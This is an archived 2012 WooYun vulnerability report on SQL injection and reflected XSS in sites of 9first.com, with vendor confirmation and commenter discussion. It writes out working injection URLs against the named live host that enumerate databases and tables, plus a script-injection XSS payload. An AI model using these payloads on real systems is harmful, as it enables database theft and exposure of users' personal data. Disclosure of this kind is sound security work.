当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010052

漏洞标题:先之某站注入

相关厂商:9first.com

漏洞作者: possible

提交时间:2012-07-23 22:52

修复时间:2012-09-06 22:53

公开时间:2012-09-06 22:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-23: 细节已通知厂商并且等待厂商处理中
2012-07-24: 厂商已经确认,细节仅向厂商公开
2012-08-03: 细节向核心白帽子及相关领域专家公开
2012-08-13: 细节向普通白帽子公开
2012-08-23: 细节向实习白帽子公开
2012-09-06: 细节向公众公开

简要描述:

先之某站存在注入,利用报错技巧获取数据库信息。

详细说明:

不好意思,找了半天也不知道注入神器放哪了,简单手动证明一下存在漏洞吧,望见谅.
注入点1:
http://ihma.9first.com/student.asp?id=559
证明:利用报错获得所有数据库
http://ihma.9first.com/student.asp?id=559%20and%20%28select%20char%2844%29%2b%20name%20from%20master..sysdatabases%20for%20xml%20path%29%3E0
同时获得网站的绝对路径。


获得当前数据库所有表:
http://ihma.9first.com/student.asp?id=-559%20union%20select%201,db_name%28%29,3,4,5,6,7,%28select%20%20char%2844%29%2bname%20from%20[sysobjects]%20where%20xtype=0x75%20for%20xml%20path%29%20,9,null


已经被截断了...
注入点2:
http://ihma.9first.com/students.html
页面搜索功能可以注入,简单输入单引号,返回:


就不继续了...
另外送两个反射xss:
http://v.9first.com/op/search.shtml?Type=ns&keyword=%27%3Cscript%3Ealert%281%29%3C/script%3E

漏洞证明:

如上

修复方案:

过滤参数
编码输出

版权声明:转载请注明来源 possible@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-07-24 10:16

厂商回复:

感谢 @possible 的反馈,已经处理.

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-23 23:00 | Anony ( 实习白帽子 | Rank:38 漏洞数:5 | 乌云白帽子一枚)

    不仅存在注入,还存在任意证书查看

  2. 2012-07-24 09:03 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @Anony 这个不懂 欢迎指教 呵呵

  3. 2012-07-24 11:44 | Anony ( 实习白帽子 | Rank:38 漏洞数:5 | 乌云白帽子一枚)

    @possible 不知道你说的注入点是不是在i###.先知这,貌似那地方每修改一个id就能看到一个人的头像跟姓名

  4. 2012-07-24 11:53 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @Anony 是呀 但是那个功能好像就是查看证书,一个id对应一个人的证书

  5. 2012-07-30 11:42 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    围观20分的SQL注入 又一个 结扎师?

  6. 2012-07-30 13:01 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @none 很简单的注入 只是厂商给力,不用围观了 呵呵